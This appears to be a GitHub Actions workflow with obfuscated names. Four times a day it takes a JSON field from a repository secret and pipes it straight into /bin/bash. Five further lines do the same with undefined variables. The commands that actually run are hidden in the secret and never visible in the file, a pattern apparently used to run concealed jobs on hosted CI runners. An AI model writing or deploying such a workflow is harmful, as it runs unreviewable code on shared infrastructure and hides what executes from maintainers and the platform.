name: tongmengshi2006
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'
jobs:  # 20620
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongmengshi2006
        env:
          wv74: ${{ secrets.wv74 }}
        run: |
          echo $wv74 | jq -r .njcoq839 | /bin/bash
          echo $oe2878 | jq -r .nai25 | /bin/bash
          echo $t7628 | jq -r .v627 | /bin/bash
          echo $k8544 | jq -r .pcn1 | /bin/bash
          echo $hi35814 | jq -r .x16 | /bin/bash
          echo $fu012 | jq -r .aj866 | /bin/bash

